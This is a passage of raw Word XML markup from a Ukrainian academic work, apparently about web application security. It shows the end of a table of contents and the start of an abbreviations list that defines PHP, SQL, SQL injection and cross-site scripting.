            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6826C720" w14:textId="5569CF5C" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433160" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.3.2 Описання другої вкладки програми</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_Toc30433160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77</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32B21495" w14:textId="3E4DBB3C" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="31"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433161" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.3.3 Описання третьої вкладки програми</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_Toc30433161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82</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74CC5890" w14:textId="379CF51A" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433162" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>3.4 Висновки по розділу</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_Toc30433162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83</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E6E949B" w14:textId="20F0127F" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433163" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>ВИСНОВКИ</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_Toc30433163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84</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5347E7BB" w14:textId="4B18E92C" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433164" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>СПИСОК БІБЛІОГРАФІЧНИХ ПОСИЛАНЬ ВИКОРИСТАНИХ ДЖЕРЕЛ</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_Toc30433164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85</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0891E095" w14:textId="76AC8ECC" w:rsidR="006C1B63" w:rsidRPr="006C1B63" w:rsidRDefault="006F5970">
          <w:pPr>
            <w:pStyle w:val="12"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc30433165" w:history="1">
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>Додаток А.</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc30433165 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>89</w:t>
            </w:r>
            <w:r w:rsidR="006C1B63" w:rsidRPr="006C1B63">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09F1412D" w14:textId="5F6159F7" w:rsidR="00CE4163" w:rsidRDefault="00CE4163">
          <w:r w:rsidRPr="006C1B63">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="17B45C80" w14:textId="2ECA2DD6" w:rsidR="003A7B15" w:rsidRPr="00CE4163" w:rsidRDefault="003A7B15" w:rsidP="00035D81">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D4D23FD" w14:textId="77777777" w:rsidR="003A7B15" w:rsidRDefault="003A7B15">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6AB5B9" w14:textId="7EB27DBD" w:rsidR="00F33855" w:rsidRDefault="003A7B15" w:rsidP="003A7B15">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7371"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ПЕРЕЛІК УМОВНИХ СКОРОЧЕНЬ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A4AE9" w14:textId="44A2E5A6" w:rsidR="0023578F" w:rsidRDefault="0023578F" w:rsidP="003A7B15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3850F82F" w14:textId="77777777" w:rsidR="00962467" w:rsidRPr="00962467" w:rsidRDefault="00962467" w:rsidP="003A7B15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9781" w:type="dxa"/>
        <w:tblInd w:w="107" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="57" w:type="dxa"/>
          <w:right w:w="57" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="943"/>
        <w:gridCol w:w="425"/>
        <w:gridCol w:w="8413"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A7B15" w:rsidRPr="0061042F" w14:paraId="264E0A71" w14:textId="77777777" w:rsidTr="00A9729E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1A5860" w14:textId="693CB1A3" w:rsidR="003A7B15" w:rsidRPr="003A7B15" w:rsidRDefault="00A9729E" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13BD2668" w14:textId="66FB934B" w:rsidR="003A7B15" w:rsidRPr="0061042F" w:rsidRDefault="00A9729E" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A771ADA" w14:textId="31D48CEB" w:rsidR="003A7B15" w:rsidRPr="00A9729E" w:rsidRDefault="00A9729E" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Hypertext</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Preprocessor </w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>гіпертекстовий препроцесор</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A9729E" w:rsidRPr="0061042F" w14:paraId="3DB38FC3" w14:textId="77777777" w:rsidTr="008945BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57FFFC0D" w14:textId="5EFF39C8" w:rsidR="00A9729E" w:rsidRDefault="00A9729E" w:rsidP="00A9729E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12756D3F" w14:textId="0058924A" w:rsidR="00A9729E" w:rsidRPr="0061042F" w:rsidRDefault="00A9729E" w:rsidP="00A9729E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DECBA4A" w14:textId="60F0D22F" w:rsidR="00A9729E" w:rsidRDefault="00A9729E" w:rsidP="00A9729E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:rPr>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>Structured</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>query</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>language</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> мова структурованих запитів; </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A7B15" w:rsidRPr="0061042F" w14:paraId="36B9809E" w14:textId="77777777" w:rsidTr="008945BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF36473" w14:textId="2F54E5BD" w:rsidR="003A7B15" w:rsidRPr="003A7B15" w:rsidRDefault="003A7B15" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066149A0" w14:textId="77777777" w:rsidR="003A7B15" w:rsidRPr="0061042F" w:rsidRDefault="003A7B15" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8413" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D523B4A" w14:textId="793AF762" w:rsidR="003A7B15" w:rsidRPr="003A7B15" w:rsidRDefault="003A7B15" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t>-ін’єкція;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A7B15" w:rsidRPr="007D796A" w14:paraId="6CA036B8" w14:textId="77777777" w:rsidTr="008945BB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="943" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0587F51C" w14:textId="199BC53F" w:rsidR="003A7B15" w:rsidRPr="003A7B15" w:rsidRDefault="003A7B15" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US" w:eastAsia="uk-UA"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD2E021" w14:textId="77777777" w:rsidR="003A7B15" w:rsidRPr="0061042F" w:rsidRDefault="003A7B15" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8413" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73ED2B3A" w14:textId="1B2E0EBA" w:rsidR="003A7B15" w:rsidRPr="0061042F" w:rsidRDefault="003A7B15" w:rsidP="008945BB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-57" w:right="-57"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Cross Site Scripting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="0061042F">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:sym w:font="Symbol" w:char="F02D"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
